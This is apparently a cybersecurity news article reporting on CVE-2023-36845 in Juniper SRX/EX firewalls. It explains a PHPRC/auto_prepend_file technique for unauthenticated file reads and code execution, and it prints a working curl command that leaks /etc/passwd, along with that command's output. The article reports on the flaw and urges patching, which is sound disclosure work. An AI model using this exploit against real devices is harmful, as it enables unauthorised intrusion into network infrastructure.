Thursday, October 3, 2024
HomeCyber Security NewsOver 80% of Juniper Firewalls Vulnerable to Unauthenticated Code Execution

Over 80% of Juniper Firewalls Vulnerable to Unauthenticated Code Execution

Published on

At the end of August 2023, Juniper Networks released a security advisory mentioning the CVE-2023-36845 vulnerability affecting SRX and EX series firewalls. The vulnerability was categorized as a Medium (5.3) severity vulnerability. 

Following this, security researchers at watchtowr published a method that could exploit this vulnerability along with the proof of concept. This particular report included the exploitation of the do_fileUpload function inside the webauth_operation.php file in the J-Web interface of the SRX firewalls. 

After this method, several threat actors started to target the webauth_operation.php file to exploit vulnerable Juniper Firewalls.

- Advertisement - EHA

Security researchers have discovered a new method that could perform an unauthenticated remote code execution without uploading any files (watchTowr method).

Document
Get a Demo

Start protecting your SaaS data in just a few minutes!

With DoControl, you can keep your SaaS applications and data safe and secure by creating workflows tailored to your needs. It’s an easy and efficient way to identify and manage risks. You can mitigate the risk and exposure of your organization’s SaaS applications in just a few simple steps.

File Upload Not available = PHPRC + cURL

As part of the analysis, researchers purchased an SRX210 firewall and tried to exploit it using the watchTowr file upload method. Unfortunately, it was not possible as the do_fileUpload was unavailable on the specified firewall.

On investigating further, researchers discovered that Juniper firewalls use an Appweb server which invokes a CGI script. This CGI script uses multiple environment variables and arguments for accessing the user’s HTTP request. Additionally, these firewalls run on FreeBSD that can access stdin by opening /dev/fd/0.

Initially, a curl request was sent with the auto_prepend_file=”/etc/passwd” which resulted in successfully leaking the information of the /etc/passwd file.

However, in order to achieve remote code execution, researchers enabled the allow_url_include feature and sent a curl request to the firewall.

This time, the request included allow_url_include,  auto_prepend_file and data:// (embedded with  <? phpinfo(); ?>) which resulted in an unauthenticated code execution. 

$ curl “http://10.12.72.1/” -F $’auto_prepend_file=”/etc/passwd\n”‘ -F ‘PHPRC=/dev/fd/0’
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
ext:*:39:39:External applications:/:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<html>
<head>
  <meta http-equiv=”Content-Type” content=”text/html”/>
  <link rel=”stylesheet” href=”/stylesheet/juniper.css” type=”text/css”/>
  <title>Log In – Juniper Web Device Manager</title>
  <link rel=”shortcut icon” href=’images/favicon.ico’ type=”image/x-icon”/>
</head>
Unauthenticated RCE Output (Source: VulnCheck)

Furthermore, a complete report has been published by Vulncheck, which also included shocking information that nearly 15,000 internet-facing Juniper firewalls were yet to be patched. 

Nevertheless, researchers also published a GitHub repository that contains a scanner that generates an error on affected systems by setting the LD_PRELOAD environment variable.

Organizations using Juniper Firewalls are recommended to upgrade to the latest version as per the security advisory released by Juniper Networks in order to prevent threat actors from leveraging these methods for exploitation.

Keep informed about the latest Cyber Security News by following us on Google NewsLinkedinTwitter, and Facebook.

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

Northern Ireland Police to Pay £750,000 Fine Following Data Breach

The Police Service of Northern Ireland (PSNI) has been ordered to pay a £750,000...

ANY.RUN Upgrades Threat Intelligence to Identify Emerging Threats

ANY.RUN announced an upgrade to its Threat Intelligence Portal, enhancing its capabilities to identify...

Cisco Nexus Vulnerability Let Hackers Execute Arbitrary Commands on Vulnerable Systems

A critical vulnerability has been discovered in Cisco's Nexus Dashboard Fabric Controller (NDFC), potentially...

Hackers Now Exploit Ivanti Endpoint Manager Vulnerability to Launch Cyber Attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the addition of a new...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

Northern Ireland Police to Pay £750,000 Fine Following Data Breach

The Police Service of Northern Ireland (PSNI) has been ordered to pay a £750,000...

Cisco Nexus Vulnerability Let Hackers Execute Arbitrary Commands on Vulnerable Systems

A critical vulnerability has been discovered in Cisco's Nexus Dashboard Fabric Controller (NDFC), potentially...

Hackers Now Exploit Ivanti Endpoint Manager Vulnerability to Launch Cyber Attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the addition of a new...